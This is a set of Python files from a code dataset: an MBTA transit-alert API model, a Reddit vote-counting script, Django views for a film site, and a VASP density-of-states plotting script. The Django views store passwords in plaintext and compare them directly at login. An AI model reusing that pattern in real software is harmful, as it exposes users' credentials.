E501\n\n Unique id of a trip # noqa: E501\n\n :return: The trip of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._trip\n\n @trip.setter\n def trip(self, trip):\n \"\"\"Sets the trip of this InformedEntity.\n\n Unique id of a trip # noqa: E501\n\n :param trip: The trip of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._trip = trip\n\n @property\n def stop(self):\n \"\"\"Gets the stop of this InformedEntity. # noqa: E501\n\n Unique id of a stop # noqa: E501\n\n :return: The stop of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._stop\n\n @stop.setter\n def stop(self, stop):\n \"\"\"Sets the stop of this InformedEntity.\n\n Unique id of a stop # noqa: E501\n\n :param stop: The stop of this InformedEntity. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._stop = stop\n\n @property\n def route_type(self):\n \"\"\"Gets the route_type of this InformedEntity. # noqa: E501\n\n | Value | Name | Example | |-------|---------------|------------| | `0` | Light Rail | Green Line | | `1` | Heavy Rail | Red Line | | `2` | Commuter Rail | | | `3` | Bus | | | `4` | Ferry | | # noqa: E501\n\n :return: The route_type of this InformedEntity. # noqa: E501\n :rtype: int\n \"\"\"\n return self._route_type\n\n @route_type.setter\n def route_type(self, route_type):\n \"\"\"Sets the route_type of this InformedEntity.\n\n | Value | Name | Example | |-------|---------------|------------| | `0` | Light Rail | Green Line | | `1` | Heavy Rail | Red Line | | `2` | Commuter Rail | | | `3` | Bus | | | `4` | Ferry | | # noqa: E501\n\n :param route_type: The route_type of this InformedEntity. # noqa: E501\n :type: int\n \"\"\"\n\n self._route_type = route_type\n\n @property\n def route(self):\n \"\"\"Gets the route of this InformedEntity. # noqa: E501\n\n Unique id of a route # noqa: E501\n\n :return: The route of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._route\n\n @route.setter\n def route(self, route):\n \"\"\"Sets the route of this InformedEntity.\n\n Unique id of a route # noqa: E501\n\n :param route: The route of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._route = route\n\n @property\n def facility(self):\n \"\"\"Gets the facility of this InformedEntity. # noqa: E501\n\n Unique id of a facility # noqa: E501\n\n :return: The facility of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._facility\n\n @facility.setter\n def facility(self, facility):\n \"\"\"Sets the facility of this InformedEntity.\n\n Unique id of a facility # noqa: E501\n\n :param facility: The facility of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._facility = facility\n\n @property\n def direction_id(self):\n \"\"\"Gets the direction_id of this InformedEntity. # noqa: E501\n\n Direction in which trip is traveling: `0` or `1`. The meaning of `direction_id` varies based on the route. You can programmatically get the direction names from `/routes` `/data/{index}/attributes/direction_names` or `/routes/{id}` `/data/attributes/direction_names`. # noqa: E501\n\n :return: The direction_id of this InformedEntity. # noqa: E501\n :rtype: int\n \"\"\"\n return self._direction_id\n\n @direction_id.setter\n def direction_id(self, direction_id):\n \"\"\"Sets the direction_id of this InformedEntity.\n\n Direction in which trip is traveling: `0` or `1`. The meaning of `direction_id` varies based on the route. You can programmatically get the direction names from `/routes` `/data/{index}/attributes/direction_names` or `/routes/{id}` `/data/attributes/direction_names`. # noqa: E501\n\n :param direction_id: The direction_id of this InformedEntity. # noqa: E501\n :type: int\n \"\"\"\n\n self._direction_id = direction_id\n\n @property\n def activities(self):\n \"\"\"Gets the activities of this InformedEntity. # noqa: E501\n\n Activities affected by this alert. If an entity is a station platform, and the alert only impacts those boarding at that platform and no one else, and the activity `\\\"BOARD\\\"` represents customers boarding at the informed entity, then the entity includes `activities` `[\\\"BOARD\\\"]`. If the alert affected customers exiting at the platform too, then `activities` is `[\\\"BOARD\\\", \\\"EXIT\\\"]`. 
It should be noted that the `activities` array includes activities that are specifically affected. Thus if there were activities `\\\"BOARD\\\"`, `\\\"EXIT\\\"`, and `\\\"USING_WHEELCHAIR\\\"` [to board or exit], and a station were closed, then the `activities` array would include `\\\"BOARD\\\"` and `\\\"EXIT\\\"` but it would not be necessary to include the activity `\\\"USING_WHEELCHAIR\\\"`. Any rider entering the station who is `\\\"USING_WHEELCHAIR\\\"` is also a rider who `\\\"BOARD\\\"`s. Using a wheelchair to board is not specifically affected. # noqa: E501\n\n :return: The activities of this InformedEntity. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._activities\n\n @activities.setter\n def activities(self, activities):\n \"\"\"Sets the activities of this InformedEntity.\n\n Activities affected by this alert. If an entity is a station platform, and the alert only impacts those boarding at that platform and no one else, and the activity `\\\"BOARD\\\"` represents customers boarding at the informed entity, then the entity includes `activities` `[\\\"BOARD\\\"]`. If the alert affected customers exiting at the platform too, then `activities` is `[\\\"BOARD\\\", \\\"EXIT\\\"]`. It should be noted that the `activities` array includes activities that are specifically affected. Thus if there were activities `\\\"BOARD\\\"`, `\\\"EXIT\\\"`, and `\\\"USING_WHEELCHAIR\\\"` [to board or exit], and a station were closed, then the `activities` array would include `\\\"BOARD\\\"` and `\\\"EXIT\\\"` but it would not be necessary to include the activity `\\\"USING_WHEELCHAIR\\\"`. Any rider entering the station who is `\\\"USING_WHEELCHAIR\\\"` is also a rider who `\\\"BOARD\\\"`s. Using a wheelchair to board is not specifically affected. # noqa: E501\n\n :param activities: The activities of this InformedEntity. 
# noqa: E501\n :type: list[str]\n \"\"\"\n\n self._activities = activities\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, InformedEntity):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, InformedEntity):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"openapi_client/models/informed_entity.py","file_name":"informed_entity.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"283798934","text":"__author__ = [ 'agentnola', 'chrispytoast123', 'jb567' ]\nimport praw\nimport json\nimport gspread\nimport re\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nbillMotionLocation = 'XII - Bill and Motion Votes'\namendmentLocation = 'XII - Amendment Votes'\nlastCellOnSheet = 'AZ'\nspreadsheet_key = '1C5lW-oBdq0m8bqqXfgV6koXyVfVII3h3y_k3PF_L7h8'\n\nhouseOfOrigin = '' # Leave Blank if Commons L if lords\nbillMotion = '' # B for Bill, M for Motion\nAmendment = '' # Only used in Amendment votes\n\n\n##FUNCTIONS {{{\ndef count(thread, sheet):\n global r\n global billMotionLocation\n global amendmentLocation\n con = 0\n not_con = 0\n dnv = 0\n\n bottomRow = int(sheet.find('Lord Speaker').row) - 1\n#Get latest vote column\n vote_cells = sheet.range('E2:' + lastCellOnSheet + '2')\n for cell in vote_cells:\n if cell.value == '':\n col = cell.col\n break\n#auto-DNV\n vote_list = sheet.range(sheet.get_addr_int(4,col) + ':' +\n sheet.get_addr_int(bottomRow, col))\n for cell in vote_list:\n if not cell.value.lower() == 'N/A'.lower():\n cell.value = 'DNV'\n dnv += 1\n sheet.update_cells(vote_list)\n\n# Automatically do the Bill Name\n title = str(submission.title)\n billNum = str(re.search('^(\\S+)', title).group())\n sheet.update_cell(2, col, billNum)\n print(billNum)\n if not re.search('^L', title) is None:\n sheet.update_cell(1, col, 'L')\n else:\n sheet.update_cell(1, col, 'C')\n# Amendment /Reading number\n if sheet.title == billMotionLocation:\n readingNum = ''\n if 'second' in title.lower() or '2nd' in title.lower():\n readingNum = '2nd'\n elif 'third' in title.lower() or '3rd' in title.lower():\n readingNum = '3rd'\n elif 'cloture' in title.lower():\n readingNum = 'Cloture'\n elif 'm' in title.lower():\n readingNum = 'Motion'\n print(readingNum)\n sheet.update_cell(3, col, '=HYPERLINK(\"'+thread+'\",\"'+readingNum+'\")')\n elif sheet.title == amendmentLocation:\n amendmentNum = str(re.search('(A\\d+)', title).group())\n sheet.update_cell(3, col, 
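# the stored HYPERLINK formula links this cell back to the voting thread\n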
'=HYPERLINK(\"'+thread+'\",\"'+amendmentNum+'\")')\n\n#Get the eligible voters\n authors_cells = sheet.range('B4:' + sheet.get_addr_int(bottomRow, 2))\n authors = []\n for author in authors_cells:\n authors.append(str(author.value).lower())\n\n submission.replace_more_comments(limit=None, threshold=0)\n comments = praw.helpers.flatten_tree(submission.comments)\n\n# Setup dupe prevention stuff\n already_done_id = []\n already_done_name = []\n dupes = []\n\n for comment in comments:\n if comment.author in already_done_name:\n print('ALERT: DOUBLE VOTING ' + str(comment.author))\n dupes.append(comment.author)\n if comment.id not in already_done_id and str(comment.author).lower() not in 'automoderator':\n print(str(comment.author) + ': ' + comment.body)\n messageContent = ''\n try:\n if str(comment.author).lower() in authors:\n already_done_id.append(comment.id)\n already_done_name.append(comment.author)\n row = 4 + authors.index(str(comment.author).lower())\n if 'not content' in str(comment.body).lower():\n not_con += 1\n dnv -= 1\n messageContent='Not'\n elif 'content' in str(comment.body).lower():\n con += 1\n dnv -= 1\n messageContent='Con'\n if messageContent != '' and sheet.acell(sheet.get_addr_int(row,\n col)).value != 'N/A':\n sheet.update_cell(row,col, messageContent)\n else:\n dupes.append(comment.author)\n else:\n print('well thats not in the list...')\n except gspread.exceptions.CellNotFound:\n print('Automoderator Comment')\n print('Dupes are:' + str(dupes))\n print('Done')\n print('My Lords, there have voted [Content](#green): ' + str(con))\n print()\n print('[Not Content:](#red) ' + str(not_con))\n print()\n print('Did Not Vote: ' + str(dnv))\n print()\n print('Turnout: ' + str(sheet.acell(sheet.get_addr_int(bottomRow + 7,col)).value) + '%')\n print()\n print('The [Contents](#green) have it.' 
\n print('===========================')\n\n#Loads the JSON Key, which is provided separately\nscope = ['https://spreadsheets.google.com/feeds']\n# Initialises all the credentials, and GoogleSheet stuff\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('ServiceKey.json', scope)\ngc = gspread.authorize(credentials)\nr = praw.Reddit('MHOC Superior House vote Counter v1')\nsh = gc.open_by_key(spreadsheet_key)\n#User Input for Reddit/ Reddit information\nuser = str(input('Reddit Username:'))\nprint('Reddit Password:')\npassword = str(input())\nr.login(user,password)\nprint('Post Voting Thread Link')\nthread = str(input())\nsubmission = r.get_submission(thread)\ntitle = submission.title\nsheet = sh.worksheet(billMotionLocation if re.search('A\\d+', title) is None else amendmentLocation)\ncount(thread,sheet)\n","sub_path":"voteCount.py","file_name":"voteCount.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"520443774","text":"import sys\n\nfrom Papers import Papers\n\n# python find-papers.py config.json\n\ndef main(argv):\n\tpapers = Papers(argv[0])\n\twhile True:\n\t\tpapers.promptToSearch()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","sub_path":"code-experiments/StoreNatureTitlesInEvernote/find-papers.py","file_name":"find-papers.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"567026154","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom django.urls import reverse\nfrom .models import UserPass, User, Movie, Instant\n\nimport json\nfrom django.core.serializers.json import DjangoJSONEncoder\n# Create your views here.\n\n\ndef index(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef products(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef comment(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n\n jiyi_comment = Instant.objects.filter(fileName__contains=\"记忆大师\")\n chaidan_comment = Instant.objects.filter(fileName__contains=\"拆弹专家\")\n if jiyi_comment.exists() and chaidan_comment.exists():\n jiyi_value = jiyi_comment.values_list('fileName', 'commentName', 'content', 'commentDate')\n jiyi_json = json.dumps(list(jiyi_value), cls=DjangoJSONEncoder)\n\n chaidan_value = chaidan_comment.values_list('fileName', 'commentName', 'content', 'commentDate')\n chaidan_json = json.dumps(list(chaidan_value), cls=DjangoJSONEncoder)\n\n return render(request, template_name, {'comment_json': jiyi_json,\n 'chaidan_json': chaidan_json,\n 'login_flag': member_name,\n 'log': log})\n\n else:\n return render(request, template_name, {'login_flag': False, 'log': log})
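\n\n# note (reviewer sketch, hypothetical helper): every view repeats the same\n# session prologue; it could be collapsed into, e.g.\n# def session_ctx(request):\n#     if request.session.get('member_id', False):\n#         return request.session.get('member_name', False), request.session.get('log', \"NULL\")\n#     return False, \"NULL\"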
\n\n\ndef community(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef details(request, movie_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n request.session['log'] = movie_name\n\n movie = Movie.objects.filter(filmName__contains=movie_name)\n if movie.exists():\n movie_value = movie.values_list('filmName', 'filmScore', 'filmRelease', 'filmComment',\n 'filmDirector', 'filmActor', 'filmKind', 'filmCountry',\n 'filmLang', 'filmLong', 'filmContent', 'filmImage')\n movie_list = list(movie_value[0])\n movie_json = json.dumps(list(movie_value[0]), cls=DjangoJSONEncoder)\n imgpath = json.dumps(movie_list[11], cls=DjangoJSONEncoder)\n filmComment = movie_list[3]\n filmName = movie_list[0]\n filmScore = movie_list[1]\n filmRelease = movie_list[2]\n filmDirector = movie_list[4]\n filmActor = movie_list[5]\n filmKind = movie_list[6]\n filmCountry = movie_list[7]\n filmLang = movie_list[8]\n filmLong = movie_list[9]\n filmContent = movie_list[10]\n\n return render(request, 'filmi/details.html', {'img_src': imgpath, 'filmScore': filmScore,\n 'filmComment': filmComment, 'filmRelease': filmRelease,\n 'filmName': filmName, 'filmDirector': filmDirector,\n 'filmActor': filmActor, 'filmKind': filmKind,\n 'filmCountry': filmCountry, 'filmLang': filmLang,\n 'filmLong': filmLong, 'filmContent': filmContent,\n 'login_flag': member_name,\n })\n else:\n # unknown movie: fall back to the front page instead of returning None\n return HttpResponseRedirect(reverse('index'))\n\n\ndef account(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef register(request):\n username = request.POST['username']\n age = request.POST['age']\n email = request.POST['email']\n actor = request.POST['actor']\n kind = request.POST['kind']\n movie = request.POST['movie']\n password = request.POST['pass']\n log = \"NULL\"\n try:\n u1 = User(username=username, age=age, email=email, actor=actor, kind=kind, movie=movie)\n u1.save()\n u2 = UserPass(user=username, password=password)\n u2.save()\n\n m = UserPass.objects.get(user=username)\n request.session['member_id'] = m.id\n request.session['member_name'] = m.user\n return HttpResponseRedirect(reverse('index'))\n except Exception:\n return render(request, 'filmi/account.html', {'login_flag': False, 'notice': \"This username is already registered, please choose another one\", 'log': log})\n\n\ndef login(request):\n try:\n m = UserPass.objects.get(user=request.POST['email'])\n if m and m.password == request.POST['password']:\n request.session['member_id'] = m.id\n request.session['member_name'] = m.user\n return HttpResponseRedirect(reverse('index'))\n else:\n return HttpResponseRedirect(reverse('index'))\n except Exception:\n return HttpResponseRedirect(reverse('index'))
\n\n\ndef search(request):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n if request.POST['find']:\n return render(request, 'filmi/community.html', {'login_flag': member_name,\n 'img_flag': True,\n 'log': log})\n else:\n return render(request, 'filmi/community.html', {'login_flag': member_name,\n 'img_flag': False,\n 'log': log})\n\n\ndef logout(request):\n # render the template here: HttpResponseRedirect takes a URL, not a template and context\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', \"null\")\n del request.session[\"member_name\"]\n del request.session[\"member_id\"] # clear the login key as well, or the user stays logged in\n return render(request, 'filmi/index.html', {\"logout_flag\": member_name,\n \"login_flag\": member_name, 'log': \"NULL\"})\n else:\n return render(request, 'filmi/index.html', {\"login_flag\": False,\n \"logout_flag\": False, 'log': \"NULL\"})\n\n\ndef change(request):\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n age = request.POST.get('age', \"null\")\n email = request.POST.get('email', \"null\")\n actor = request.POST.get('actor', \"null\")\n kind = request.POST.get('kind', \"null\")\n movie = request.POST.get('movie', \"null\")\n\n user = User.objects.get(username=member_name)\n if user:\n user.age = age\n user.email = email\n user.actor = actor\n user.kind = kind\n user.movie = movie\n\n user.save()\n\n return render(request, 'filmi/index.html', {'login_flag': member_name, 'log': log})\n\n else:\n return render(request, 'filmi/index.html', {'login_flag': False, 'log': log})\n\n\ndef person(request, user_name):\n log = \"NULL\"\n if request.session.get('member_id', False):\n log = request.session.get('log', \"NULL\")\n user = User.objects.filter(username__contains=user_name)\n user_value = user.values_list('username', 'age', 'email', 'actor', 'kind', 'movie')\n user_list = list(user_value[0])\n return render(request, 'filmi/person.html', {\"usr_name\": user_list[0], \"usr_age\": user_list[1],\n \"usr_email\": user_list[2], \"usr_actor\": user_list[3],\n \"usr_kind\": user_list[4], \"usr_movie\": user_list[5],\n \"login_flag\": user_name, \"log\": log})\n else:\n return render(request, 'filmi/index.html', {\"login_flag\": False, \"log\": log})\n\n","sub_path":"filmi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"85848475","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Still need to improve the code to print all plots in pdf\n#https://matplotlib.org/examples/color/named_colors.html for python colors\n'''\nThe DOSCAR file has the following organization:\n1) First there is a header. \n2) The important line from this is the 6th line which contains \n a) energy range used for the density of states,\n b) the number of bins, and \n c) the Fermi energy.\n3) In the case of non-spin-polarized calculation, you will see 3 columns:\n a) E, \n b) TDOS, and \n c) integrated TDOS. \n4) In the case of a spin-polarized calculation, you will see 5 columns: \n a) E, \n b) TDOS up, \n c) TDOS down, \n d) integrated TDOS up, and \n e) integrated TDOS down.\n5) if LORBIT = 11 then after this, at line NEDOS + 8, you'll have\nthe beginning of the partial density of states. \n a) Every NEDOS+1 lines, there will be another entry. \n b) Each of these blocks corresponds to each of the atoms listed in your POSCAR file. \n c) Between each the line of the header with energy ranges, etc. is repeated. \n d) The columns are ordered similarly to the PROCAR file labels. \n e) So the first column is the energy followed by: E, s, p_y, p_z, p_x, d_xy, d_yz, d_z2, d_xz, d_x2.\n f) Again, if it is spin-polarized, then there will be an up and down column for each of these. \n g) This would give 10 total columns or 19 if spin-polarized. \nIf you have included elements with POTCARs that specifically include f-orbitals, \nthen there will also be another 7 columns that deal with each of these (14 for spin polarization). \nAgain the order is similar to the PROCAR, except that now they are labeled with the lm number \n(-3, -2, -1, 0, 1, 2, 3). \n\nNow, since each atom is listed separately, you may need to sum up atoms to see the full \ncontribution from that species (for example to see the O 2p band in an oxide you would have to\nsum all three p orbitals for all O atoms). Or if you want to look at a layer in a material, you'll\nneed to manually sum up each atom's contribution in the layer. If you are curious about crystal \nfield effects on a given atom, the individual d-orbitals are given with respect to the Cartesian\ncoordinates (not the lattice constants). So if you have, say an octahedrally coordinated transition\nmetal, you may need to rotate the cell such that the octahedron is oriented along the Cartesian axes\n(or close to it if it is distorted).\n'''
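\n\n# worked example (illustrative numbers, matching the commented defaults below):\n# a 6th line such as\n#   20.000  -113.879  301  12.0361  1.0000\n# is parsed in cell In[3] into eMax=20.0, eMin=-113.879, nBins=301, eFermi=12.0361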
\n\n\n# In[2]:\n\n\n#from IPython.core.display import display, HTML\n#display(HTML(\"<style>.container { width:100% !important; }</style>\"))\n\n#from IPython.display import display, Math, Latex\nimport os\nimport re\nimport csv\nimport math\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport ase.io\nimport ase.neighborlist\nfrom ase import atom\n\nprint(os.getcwd())\n\nDOSCARfileName='./DOSCAR' #dos data is present here\nCONTCARfileName='./CONTCAR' #required for counting and naming species etc.\nOUTDIR='./ldos'\nif not os.path.exists(OUTDIR):\n os.mkdir(OUTDIR)\npdosPlots='pdosPlots.pdf' #output file\n\nnormTotal=10\n#min=-113.879\n#Emax=12.031\n#DeltaE=0.01\n#Fermi=12.0361\n#totElectronsCheck=912\n\nsystem = ase.io.read(CONTCARfileName,format=\"vasp\")\n\n#get_ipython().run_line_magic('matplotlib', 'inline')\n#%matplotlib auto\n#font = {'family' : 'DejaVu Sans',\n# 'size' : 18}\n\n#matplotlib.rc('font', **font)\n#matplotlib.rc('xtick', labelsize=18) \n#matplotlib.rc('ytick', labelsize=18)\n\nSMALL_SIZE = 14\nMEDIUM_SIZE = 16\nBIGGER_SIZE = 18\n\nplt.rc('font', size=MEDIUM_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\n#global Elist\n#global pdostot\n#global temppdos\n\n\n# In[3]:\n\n\nDOSCARfile=open(DOSCARfileName,'r')\ni=0\nsumUP=0\nsumDOWN=0\nfor line in DOSCARfile :\n if (i==0):\n line=line.split()\n nAtm=int(line[0])\n if (i==5):\n #print(i-5,line)\n line=line.split()\n eMax=float(line[0])\n eMin=float(line[1])\n nBins=int(line[2])\n eFermi=float(line[3])\n if (i==6):\n line=line.split()\n if(len(line)==5):\n print(\"Spin polarized dos\")\n else:\n print(\"Not a spin polarized dos\")\n sumUP += float(line[1])\n sumDOWN += float(line[2]) # spin-down TDOS is column 2 (column 3 is the integrated up channel)\n if (i>6 and i<=5+nBins): # the total-DOS block spans lines 6 .. 5+nBins (was hard-coded to 300 bins)\n line=line.split()\n #print(line[0],line[1],line[3])\n if (float(line[0])<=eFermi):\n sumUP += float(line[1])\n sumDOWN += float(line[2])\n #print(line[0],\"\\t\",sumUP,\"\\t\",sumDOWN,\"\\t\",line[3],\"\\t\",line[4])\n i=i+1\nif(nAtm+1-(i-5)/(nBins+1)==0):\n print(\"Everything is all right\")\nelse:\n print(\"check your DOSCAR\")\nprint(sumUP, sumDOWN, nBins)\nDOSCARfile.close()
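\n\n# note (reviewer): the loop above sums the total DOS for bins below eFermi, so\n# sumUP/sumDOWN track the occupied spin-up/down states (an electron count once\n# multiplied by the energy bin width, depending on the DOSCAR normalisation).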
\n\n\n# In[4]:\n\n\n##creating pdf\nwith PdfPages(pdosPlots) as pdf:\n for i in range(0,nAtm): ## i runs over all nAtm atoms\n DOSCARfile=open(DOSCARfileName,'r')\n it=0\n atm=i+1\n dos=np.zeros((33,nBins)) ## up to 33 orbital columns (incl. f-orbitals) by nBins energy bins\n totaldos=np.zeros((5,nBins))\n for line in DOSCARfile :\n if ( it>=6+(0+0)*(nBins+1) and it<=4+(0+1)*(nBins+1) ):\n j=it-6\n line=line.split()\n for k in range(0,5):\n totaldos[k,j]=float(line[k])\n if ( it>=6+(atm+0)*(nBins+1) and it<=4+(atm+1)*(nBins+1) ):\n j=it-6-atm*(nBins+1)\n line=line.split()\n for k in range(0,19):\n dos[k,j]=float(line[k])\n it=it+1\n DOSCARfile.close()\n #print(dos)\n atomLegend=str(system.get_chemical_symbols()[atm-1])+str(atm)\n plt.rcParams['figure.figsize'] = [11, 8.5] \n lineSUp, =plt.plot(dos[0], dos[1] ,linestyle='-', color='b', linewidth=1.6)\n lineSDn, =plt.plot(dos[0],-dos[2] ,linestyle='-', color='b', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([lineSUp,lineTUp],[atomLegend+'$-s$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)\n plt.ylabel('Total DOS (arb. units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-6, 6))\n pdf.savefig() \n #plt.show()\n plt.close()\n \n linePxUp, =plt.plot(dos[0], dos[3] ,linestyle='-', color='g', linewidth=1.6)\n linePxDn, =plt.plot(dos[0],-dos[4] ,linestyle='-', color='g', linewidth=1.6)\n \n linePyUp, =plt.plot(dos[0], dos[5] ,linestyle='-', color='r', linewidth=1.6)\n linePyDn, =plt.plot(dos[0],-dos[6] ,linestyle='-', color='r', linewidth=1.6)\n \n linePzUp, =plt.plot(dos[0], dos[7] ,linestyle='-', color='m', linewidth=1.6)\n linePzDn, =plt.plot(dos[0],-dos[8] ,linestyle='-', color='m', linewidth=1.6)\n \n linePTUp, =plt.plot(dos[0], dos[3]+dos[5]+dos[7], linestyle='-.', color='black', linewidth=1.6)\n linePTDn, =plt.plot(dos[0],-dos[4]-dos[6]-dos[8], linestyle='-.', color='black', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([linePxUp,linePyUp,linePzUp,linePTUp,lineTUp],\n [atomLegend+'$-p_x$',atomLegend+'$-p_y$',atomLegend+'$-p_z$',atomLegend+'$-p_{Total}$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)
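\n # note: the plots keep the raw DOSCAR energy axis (the vertical line marks\n # eFermi); the .dat writers in the next cell shift energies by eFermi instead.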
\n plt.ylabel('Total DOS (arb. units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-5, 6))\n pdf.savefig() \n #plt.show()\n plt.close()\n \n lineDxyUp, =plt.plot(dos[0], dos[9] ,linestyle='-', color='y', linewidth=1.6)\n lineDxyDn, =plt.plot(dos[0],-dos[10],linestyle='-', color='y', linewidth=1.6)\n \n lineDyzUp, =plt.plot(dos[0], dos[11],linestyle='-', color='k', linewidth=1.6)\n lineDyzDn, =plt.plot(dos[0],-dos[12],linestyle='-', color='k', linewidth=1.6)\n \n lineDzxUp, =plt.plot(dos[0], dos[13],linestyle='-', color='c', linewidth=1.6)\n lineDzxDn, =plt.plot(dos[0],-dos[14],linestyle='-', color='c', linewidth=1.6)\n \n lineDx2y2Up,=plt.plot(dos[0], dos[15],linestyle='-', color='cadetblue', linewidth=1.6)\n lineDx2y2Dn,=plt.plot(dos[0],-dos[16],linestyle='-', color='cadetblue', linewidth=1.6)\n \n lineDz2Up, =plt.plot(dos[0], dos[17],linestyle='-', color='firebrick', linewidth=1.6)\n lineDz2Dn, =plt.plot(dos[0],-dos[18],linestyle='-', color='firebrick', linewidth=1.6)\n \n lineDTUp, =plt.plot(dos[0], dos[ 9]+dos[11]+dos[13]+dos[15]+dos[17],linestyle='-.', color='black', linewidth=1.6)\n lineDTDn, =plt.plot(dos[0],-dos[10]-dos[12]-dos[14]-dos[16]-dos[18],linestyle='-.', color='black', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([lineDxyUp,lineDyzUp,lineDzxUp,lineDx2y2Up,lineDz2Up,lineDTUp,lineTUp],\n [atomLegend+'$-d_{xy}$',atomLegend+'$-d_{yz}$',atomLegend+'$-d_{zx}$',\n atomLegend+'$-d_{x^2-y^2}$',atomLegend+'$-d_{z^2}$',atomLegend+'$-d_{Total}$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)
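\n # note: the total DOS is divided by normTotal so it fits on the same axis\n # as a single atom's PDOS (hence the '$Total$/' legend labels).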
